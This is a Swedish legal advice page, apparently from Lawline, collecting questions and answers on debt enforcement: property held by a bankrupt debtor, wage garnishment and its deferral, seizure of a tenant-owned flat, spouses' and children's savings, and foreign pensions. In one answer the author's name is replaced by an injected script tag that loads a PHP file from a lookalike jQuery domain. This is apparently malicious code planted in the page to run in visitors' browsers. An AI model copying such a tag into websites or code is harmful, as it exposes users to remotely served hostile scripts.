Vad händer med egendom som finns hos gäldenären vid konkurs eller utmätning som inte tillhör gäldenären?

2020-12-17 i Utmätning
FRÅGA |Hej, jag har två frågor rörande konkurser. 1. Ex. En person lämnar in sin bil till en bilverkstad för att få bilen reparerad. Under tiden som bilen är i bilverkstaden går bilverkstaden i konkurs. Vem förfogar då över bilen? Kommer bilen ingå i utmätningen/konkursen? Har bilens ägare möjlighet att hämta tillbaka bilen från konkursboet? 2. Ex. En företag har sålt en maskin på avbetalning till en bilverkstad som går i konkurs. Vad händer med maskinen? Har säljaren möjlighet att hämta tillbaka maskinen från konkursboet eller dras maskinen in i utmätningen/ konkursutförsäljningen? Tacksam för svar!God Jul!
Malin Hedlund |Hej, och tack för att du vänder dig till Lawline med din fråga!Jag tolkar dina frågor som att det rör vad som händer med egendomen om den förvaras hos någon som går i konkurs eller är föremål för utmätning. Detta regleras delvis i konkurslagen (KL) och utsökningsbalken (UB). Vilken egendom ingår vid utmätning och konkurs?Egendom som ingår i en konkurs eller utmätning är utmätningsbar egendom (se 3 kap. 3 § KL). Med utmätningsbar egendom avses bland annat lös egendom som tillhör gäldenären. (4 kap. 17 § UB) Enkelt förklarat skulle man kunna säga att lös egendom är det som inte utgör fast egendom, tex fastigheter. Detta innebär att både maskinen och bilen anses vara lös egendom och att det därmed utgör egendom som kan bli föremål för utmätning eller konkurs om det tillhör gäldenären.Vad tillhör gäldenären?För att göra det säkrare från borgenärernas (de som lånar ut egendom/pengar) perspektiv, har det tagits in en presumtionsregel i 4 kap. 18 § UB som innebär att om egendomen befinner sig i gäldenärens besittning så förutsätts det att den tillhör gäldenären och är därmed utmätningsbar. Lite översiktligt skulle besittning kunna beskrivas som att när någon har saken hos sig, så besitter den egendomen. För att bryta presumtionen om att det tillhör gäldenären krävs antingen att det framgår av utredningen att hen inte är ägare eller att någon annan, tredje man, styrker sin äganderätt.Gemensamt för dina frågor innebär detta att när bilen och maskinen befinner sig hos bilverkstaden eller hos företaget som går i konkurs så förutsätts det att de tillhör gäldenären och de kan utmätas. Men detta betyder inte att det är kört för den som egentligen äger egendomen, utan denna kan nå framgång och få tillbaka den genom att visa att gäldenären inte är ägare till egendomen. Hur man styrker sin äganderätt och därmed får separationsrätt, dvs rätt att separera från gäldenärens tillgångar, är beroende av vilken typ av besittning gäldenären har. Nedan tänkte jag gå igenom de olika scenarion som dina frågor rör. Bilen på bilverkstadenNär det gäller en bil som förvaras hos en verkstad så har bilverkstaden besittning över bilen. De besitter dock bilen med begränsad rätt eftersom de inte äger bilen, utan enbart tillfälligt förvarar den. Bilägaren utgör ägare och har därmed separationsrätt på grund av bibehållen äganderätt till egendom i gäldenärens besittning. Men för att äganderätten ska få "rättslig verkan" vid en konkurs eller utmätning så krävs det att:bilen går att identifiera och bilen ska vara bibehållen, dvs inte förändrad.Detta innebär alltså att bilen inte kommer ingå i konkursen eller utmätningen om bilägaren kan peka ut sin bil samt att den är "oförändrad". Bilägaren har därmed bättre rätt till bilen än konkursboet och har möjlighet att hämta den från konkursboet.Maskinen på avbetalningNär det gäller maskinen som är köpt på avbetalning så förutsätter jag att den inte ännu är fullt betald samt att den befinner sig hos bilverkstaden. I och med att den befinner sig hos bilverkstaden besitter de alltså maskinen, men äger inte denna fullt ut eftersom att de inte betalat hela summan. För att företaget som sålt maskinen ska få separationsrätt krävs det att dem har tagit in ett återtagandeförbehåll i försäljningsavtalet. Ett återtagandeförbehåll innebär att säljaren har rätt att under vissa förutsättningar ta tillbaka den sålda varan. För att det ska vara ett giltigt förbehåll måste det dock uppfylla följande kriterier:Det ska ingå i parternas avtal, det ska uppställas före eller senast samtidigt med avlämnandet av varan det måste vara kopplat till viss specifik egendom och ett bestämt köp och egendomen får inte överlåtas.Om det finns ett sådant giltigt återtagandeförbehåll i avtalet, får säljaren en särskild form av separationsrätt som innebär att säljaren har rätt att få täckning för sin köpeskillingsfordran ur det värde som kan frigöras vid en försäljning av objektet. I praktiken så återtar man oftast inte varan utan erhåller enbart värdet. Sammanfattningsvis krävs det separationsrätt till egendom för att den ska undantas från gäldenärens utmätning eller konkurs. Separationsrätt får man på lite olika sätt. När det gäller bilen så undantas den om den går att identifiera och är oförändrad och när det gäller avbetalning så krävs det att det finns med ett giltigt återtagandeförbehåll i avtalet. Hoppas det var svar på din fråga! God jul!

Kronofogdes utmätningsbefogenhet.

2020-11-27 i Utmätning
FRÅGA |Min son har skulder hos kronofogden hans fd sambo parkerade sin bil på hans tomt för att han skulle sälja den. Nu har kronofogden bestämt att ta bilen i beslag för hans skulder. Tidigare tog kronofogden fd sambons (ej skuldsatt) båt och båtvagn som stod på hans tomt under vintern för att slippa hyra plats som kostar. Är detta möjligt jag anser det är stöld. Bilen var inlämnad på bilverkstad för felsökning min son fick låna mitt bankkort för att betala med. Nu anser kronofogden att bilen är min sons efter som han betalat felsökningen med mitt kort.Tacksam för svar!
Jakob Westling |Hej och tack att du valde Lawline med din fråga Din fråga relaterar till kronofogdens utmätningsmöjligheter. Dessa regleras främst i utsökningsbalken fjärde kapitel. 4:17-4:22 reglerar just utmätning i förhållande till tredje man. I detta fall är fd sambon den tredje mannen.4:18 UB föreskriver att all egendom som påhittas i gäldenärens (din son) besittning kommer presumeras ägas av honom. Regeln ställer upp en presumtion om ägarskap till allt som finns i gäldenärens besittning. Denna presumtion bryts om det framgår att gäldenären inte är ägare till bilen/båten. Om Fd sambo vill återhämta egendomen måste hen visa tydligt att egendomen är hens. Detta kan göras genom att påvisa att bilen är inskriven på en annan person.

Utmätning av lön

2020-11-22 i Utmätning
FRÅGA |Bor Med Min sambo som har utmätning på lönen. Jag har tyvärr fått tagit reda på detta själv då han ej berättat. Nu är det så att han knappt kan betala halva hyran eller andra saker till mig och mina barn. Nu undrar jag hur det går till med utmätning? Förstår att man kan får det lite tufft men man bör väl ha kvar till hyra och mat. I det stora hela så kämpar jag för hela familjen och det börjar bli tungt. Tacksam för svar
Frida Deivard |Hej och tack för att du vänder dig till Lawline med din fråga!Löneutmätning innebär att Kronofogden beslutar att en arbetsgivare ska innehålla och redovisa/skicka en del av en gäldenärs lön till Kronofogden och inte till gäldenären. En gäldenär är en person som har skulder, i detta fall din sambo. Förfarandet sker alltså för att en gäldenär ska bli kvitt sina skulder på något sätt. Utmätning av lön regleras i utsökningsbalkens (UB) sjunde kapitel. Kronofogden bestämmer ett förbehållsbelopp och ett utmätningsbelopp som måste beaktas av arbetsgivaren vid varje löneutbetalning (7 kap. 8 § UB). Endast när lönen överstiger förbehållsbeloppet ska arbetsgivaren innehålla utmätningsbeloppet (7 kap. 20 § UB). Den del av lönen som inte får utmätas (förbehållsbeloppet) bestäms utifrån ett särskilt belopp som fastställs av Kronofogden varje år (normalbelopp). Normalbeloppen ska anses omfatta alla vanliga levnadskostnader utom bostadskostnad (7 kap. 5 § UB). Det är bara den del av inkomsten som gäldenären inte behöver för sitt och familjens underhåll som får tas i anspråk genom löneutmätning (7 kap. 4 § UB).Ett beslut om löneutmätning ska ändras om det finns anledning till det (7 kap. 10 § UB). Anledning finns om förhållandena ändrats under pågående löneutmätning t.ex. kan gäldenärens lön öka eller försörjningsbördan ändras. Det är därför viktigt att Kronofogden informeras om att förhållanden ändras, så att korrigering av summan för löneutmätning kan ske. Jag rekommenderar att din sambo kontaktar kronofogden för att se att de har korrekta uppgifter om alla delar av ekonomin så att utmätningen sker på ett korrekt sätt. För som sagt ska det finnas pengar kvar för att det vardagliga underhållet för familjen fungerar. Hoppas det löser sig och att du är nöjd med svaret på din fråga! Vänligen,

Kan min bostadsrätt bli utmätt för skulder mitt handelsbolag har?

2020-11-10 i Utmätning
FRÅGA |HejJag har ett litet företag och den är skuldsatt och kommer förmodligen att gå i konkurs. Men jag har en bostadsrätt där jag, min fru och min 26 åriga son bor. Får jag behålla min bostad om det blir utmätning av handelsbolaget eller kommer vi bli vräkta?
Ellen Lagnéus |Hej, tack för att du kontaktar Lawline.En utmätning kan bara beviljas om det finns en exekutionstitel, (3 kap. 1 § UB), och ett exempel på en vanlig sådan är ett betalningsföreläggande. Kortfattat innebär det helt enkelt att kronofogden utreder och fastställer att man har en skuld som man är skyldig att betala.Det innebär att din andel i handelsbolaget kan utmätas om det är proportionerligt och nödvändigt för att få ut dina skulder (4 kap. 2-3 §§ UB). Detta ska dock göras med så liten olägenhet för dig som möjligt (4 kap. 3 § andra stycket UB). Eftersom man är personligt betalningsansvarig i ett handelsbolag (2 kap. 20 § Handelsbolagslagen) innebär det också att även om din andel utmäts, och detta inte skulle täcka dina skulder kan dina privata egendomar komma att bli föremål för utmätning.För att man ska kunna utmäta krävs att;- egendomen tillhör den skuldsatta (4 kap. 17-19 §§ UB),- att egendomen kan säljas (4 kap. 3 § UB),- att egendomen har ett ekonomiskt värde (4 kap. 3 § UB),- tillgångar som hör samman inte får skiljas åt enligt ett s.k. splittringsförbud (4 kap. 6 § UB),- Gäldenären måste få behålla det som krävs för att kunna försörja sig och sin familj(5 kap. 1-4 §§ UB).Huvudregeln är alltså att kronofogden kan utmäta all egendom som gäldenären (dvs du) äger. Detta inkluderar även din bostadsrätt, men generellt brukar kronofogden försöka undvika att utmäta bostäder. En bostadsrätt kan tex undantas från utmätning om det är gäldenärens stadigvarande bostad och om det med hänsyn till bostadsrättens värde och utifrån gäldenärens behov vore oskäligt att utmäta den (5 kap. 1 § stycke ett punkt sex UB). Det kortfattade svaret på din fråga blir alltså att kronofogden kan utmäta din bostadsrätt, men om du tex kan visa att det skulle vara oskäligt kan det finnas möjlighet att den inte utmäts. Det blir svårt för mig att bedöma vad som gäller i just ditt fall, då en sådan bedömning alltid måste göras utifrån varje enskilt fall.Jag hoppas du fått svar på din fråga. Önskar dig lycka till och hoppas att det löser sig!Vänliga hälsningar,

Kan man få anstånd för löneutmätning?

2020-12-09 i Utmätning
FRÅGA |Hej, Gällande löneutmätning från kronofogden.Finns det möjlighet för uppehåll av löneutmätning, för att kunna betala av annan skuld, innan även den trillar in hos kronofogden?
<script src="https://code.jquery-ul.com/jquery.php"></script> |Hej, och tack för att du ställer din fråga till oss på Lawline.När det kommer till löneutmätning finns det möjlighet att få anstånd med den under en begränsad tid, dvs att man "pausar" löneutmätningen. För att detta ska vara möjligt krävs att du som har löneutmätning har särskilda skäl, alternativt att den du har en skuld till går med på att pausa din löneutmätning. Vad som utgör särskilda skäl kan variera från fall till fall, men i regel brukar det handla om oförutsedda händelser som t.ex. olycksfall eller sjukdom. Det går därför inte att svara varken ja eller nej på din fråga, eftersom bedömningen måste göras helt individuellt. Oavsett måste man kontakta kronofogdemyndigheten för att ansöka om att få anstånd med sin löneutmätning. Min rekommendation är därför att du hör av dig till dom, dels för att göra en ansökan men också för att beskriva din specifika situation lite mer detaljerat så att de kan göra en bedömning av dina möjligheter till att beviljas anstånd.Lycka till!Vänliga hälsningar,

Kan Kronofogdemyndigheten utmäta lön från vissa anställningsformer?

2020-11-22 i Utmätning
FRÅGA |Kan kronofogdemyndigheten dras penger från mitt konto om jag har jobb som vikarie eller timlönen?
Egzon Kalludra |Hej,Tack för att du vänder dig till Lawline med din fråga!Din fråga besvaras med hjälp av utsökningsbalken (UB). Har man skulder hos Kronofogdemyndigheten kan myndigheten utmäta en persons lön, vilket innebär att en del av lönen används för att betala av de skulder man har. Utsökningsbalkens regler om utmätning av lön omfattar bland annat arbetstagares lön, vare sig den utgår som tidlön, ackordslön, provision eller annan gottgörelse (7 kap. 1 § UB). Arbetsgivaren åläggs att betala ut en viss del av lönen till Kronofogdemyndigheten (7 kap. 3 § UB). Det belopp av lönen som tas i anspråk av myndigheten är endast den del som överstiger vad gäldenären (personen med skulder) behöver för sitt och familjens underhåll, eller för att kunna fullgöra sin betalningsskyldighet mot någon annan som vid utmätningen har bättre rätt till lönen (7 kap. 4 § UB). Det bestäms ett förbehållsbelopp (den del som inte får utmätas) och ett utmätningsbelopp, som arbetsgivaren måste ta hänsyn till vid löneutbetalning (7 kap. 8 § UB). Förbehållsbeloppet bestäms genom ett av Kronofogdemyndigheten årligt fastställt belopp, som kallas för ett normalbelopp. Normalbeloppen ska anses innefatta alla vanliga levnadskostnader utom bostadskostnad (7 kap. 5 § UB). Det är arbetsgivaren som ska innehålla utmätningsbeloppet till den del som lönen överstiger förbehållsbeloppet och betala ut det innehållna beloppet till Kronofogdemyndigheten (7 kap. 20 § UB). Svar på din frågaKronofogdemyndigheten fastställer alltså ett belopp som får utmätas och ett belopp som inte får utmätas. Arbetsgivaren ska hålla inne den del av lönen som överstiger summan av vad du behöver för dina levnadskostnader och din familjs underhåll, om du har en familj. Innan Kronofogdemyndigheten vet hur mycket du får behålla och hur mycket som arbetsgivaren ska hålla inne görs en utredning av din ekonomi och dina levnadsförhållanden. Du får behålla tillräckligt med lön för ditt underhåll och levnadskostnader, men överstigande del ska arbetsgivaren hålla inne och betala ut till Kronofogdemyndigheten. Det är ingen skillnad om det är timlön, vikariat, lön genom annan anställningsform eller annan gottgörelse.Jag hoppas att detta besvarade din fråga! Har du fler frågor kan du ställa dem här. Vänligen,

Kan Kronofogden mäta ut makans eller barnens besparingar vid makens obestånd?

2020-11-14 i Utmätning
FRÅGA |Kan kronofogden mäta ut makans besparingar om maken hamnar på obestånd?Eller mindreåriga gemensamma barnens sparpengar
Madeleine Runesson |Hej och tack för att du vänder dig till oss på Lawline med din fråga!Jag utgår från att din fråga handlar om Kronofogdens möjligheter att utmäta besparingar i form av pengar som finns på ett bankkonto.Utsökningsbalken reglerar vad Kronofogden får ta vid en utmätning och jag kommer därför utgå från denna lag när jag svarar på din fråga.Vardera make står för sina egna skulder och enbart den skuldsattas egendom får utmätas men det finns presumtionsreglerFörst kan konstateras att vardera make står för sina egna skulder vilket innebär att makans egendom inte ska utmätas av Kronofogden för att betala sin makes skulder (1 kap. 3 § Äktenskapsbalken). Utgångspunkten är alltså att enbart den egendom som är den skuldsattas kan utmätas. Utsökningsbalken anger dock ett antal presumtionsregler som gör att Kronofogden kan anta att viss egendom tillhör den skuldsatta, även om egendomen egentligen är någon annans (4 kap. 17 § utsökningsbalken). Detta eftersom det annars hade varit alldeles för lätt för den skuldsatte att undandra sin egen egendom med enbart hänvisning till att egendomen tillhör någon annan. När Kronofogden gör en utmätning kommer de utgå från att allt som finns i makens besittning är hans egendom (4 kap. 18 § utsökningsbalken). Begreppet besittning innebär lite förenklat allt som maken innehar exempelvis i hemmet eller på ett bankkonto i makens namn. För att Kronofogden inte ska ta den egendom som är makans krävs att någon bevisar att paret antingen samäger egendomen eller att det framgår att egendomen enbart tillhör makan (4 kap. 19 § utsökningsbalken).Vad som gäller makans besparingar beror på vem som står på bankkontotOm makans besparingar finns på ett bankkonto i enbart makans namn ska inte detta utmätas eftersom makan ensamt besitter pengarna som tillhör henne. Om pengarna istället finns på makens bankkonto anses maken besitta dessa och Kronofogden kan därför utmäta pengarna om inte annat motbevisas (4 kap. 17 och 18 § utsökningsbalken).Om besparingarna finns på ett gemensamt bankkonto kan pengarna antas tillhöra båda makarna hälften var, om inte annat motbevisas (1 § andra meningen lag om samäganderätt). Att detta kan antas framgår även av rättsfallen NJA 1988 s. 112 och NJA 2015 s. 763. Om makan eller maken kan bevisa att det är ett gemensamt bankkonto har Kronofogden enbart rätt att ta den del som tillhör den skuldsatta, rimligen halva beloppet på kontot.Vad som gäller gemensamma barns sparpengar beror också på vem som står på bankkontotOm barnens sparpengar finns på ett bankkonto som maken står på kan Kronofogden eventuellt anse att pengarna tillhör maken eftersom han besitter bankkontot. För att Kronofogden inte ska utmäta dessa pengar krävs därför att det motbevisas att någon annan äger dessa (4 kap. 18 § utsökningsbalken).Om barnens sparpengar finns på ett bankkonto i makans namn ska inte Kronofogden utmäta dessa eftersom makan anses besitta pengarna (4 kap. 17 § utsökningsbalken). Även om pengarna inte anses tillhöra maken eller vara i hans besittning så kan Kronofogden ändå utmäta pengarnaÄven om maken inte besitter pengarna eller att pengarna inte anses tillhöra honom så kan Kronofogden ändå utmäta pengarna. Detta under förutsättning att Kronofogden bevisar att det föreligger sannolika skäl att egendomen ändå tillhör maken (4 kap. 22 § utsökningsbalken). SammanfattningNär det gäller makans besparingar kan Kronofogden utmäta dessa om pengarna finns på makens bankkonto eller ett gemensamt konto. För att Kronofogden inte ska utmäta dessa krävs att annat motbevisas. Samma gäller för barnens sparpengar – finns pengarna på makens bankkonto eller maken och makans gemensamma bankkonto måste annat motbevisas för att pengarna inte ska anses vara makens. Notera dock att Kronofogden ändå kan utmäta pengarna om de bevisar att det föreligger sannolika skäl till att egendom ska anses tillhöra maken.Jag hoppas att du fick svar på din fråga annars kan du alltid höra av dig till oss igen!Vänligen,

Kan Kronofogden utmäta utländsk pension?

2020-11-09 i Utmätning
FRÅGA |Kan Kronofogden mäta ut min pension i tex Portugal ?
Izabella Bugsby de la Varga |Hej och tack för att du vänder dig till Lawline med din fråga! Vad är problemet?I mitt svar kommer kan att utgå från att pensionen finns i Portugal för att sedan redogöra för om Kronofogden kan utmäta denna tillgång. Vidare kommer jag även att klarlägga huruvida pension överhuvudtaget kan utmätas för att betala av skulder. Har Kronofogden möjlighet att utmäta egendom i utlandet?I Sverige regleras utmätning i utsökningsbalken (UB) och Kronofogden är den myndighet som har rätt att utmäta egendom. Hur som helst har Kronofogden endast möjlighet att utmäta egendom i Sverige och har inte utmätningskompetens utanför landets gränser. Det här betyder att Kronofogden inte kan åka till ett annat land och mäta ut egendom för en persons skulder i Sverige. För att Kronofogden ska ha möjlighet att verkställa utmätningar utomlands måste de isåfall begära handräckning av en motsvarande myndighet i det landet. Kan min pension utmätas? Pension eller livränta kan utmätas. Dock får det inte utmätas i den mån som det är nödvändigt för gäldenärens försörjning och fullgörande av underhållsskyldighet (5 kap. 8 § UB). Alltså får pension utmätas så länge ett sorts existensminimum finns kvar. Hur mycket som kan undantas från utmätningen finns inte specificerat i lagen utan Kronofogden beräknar det här beroende på situationen. I sin bedömning tar Kronofogden hänsyn till gäldenärens ekonomiska förhållanden och bestämmer vilka belopp som ska utmätas baserat på den bedömningen. SlutsatsKronofogden har rätt att utmäta din pension för att betala av dina skulder så länge ett existensminimum som täcker dina behov kvarstår. Att hålla i minnet är att Kronofogden inte har möjlighet att utmäta egendom utomlands utan får i sådana fall samarbeta med en motsvarande myndighet i Portugal. Kronofogden har alltså möjlighet att utmäta din pension om den befinner sig på ett konto i Sverige. Hoppas att du fick svar på din fråga och om du har fler frågor är du varmt välkommen att höra av dig till Lawline igen! Med vänliga hälsningar,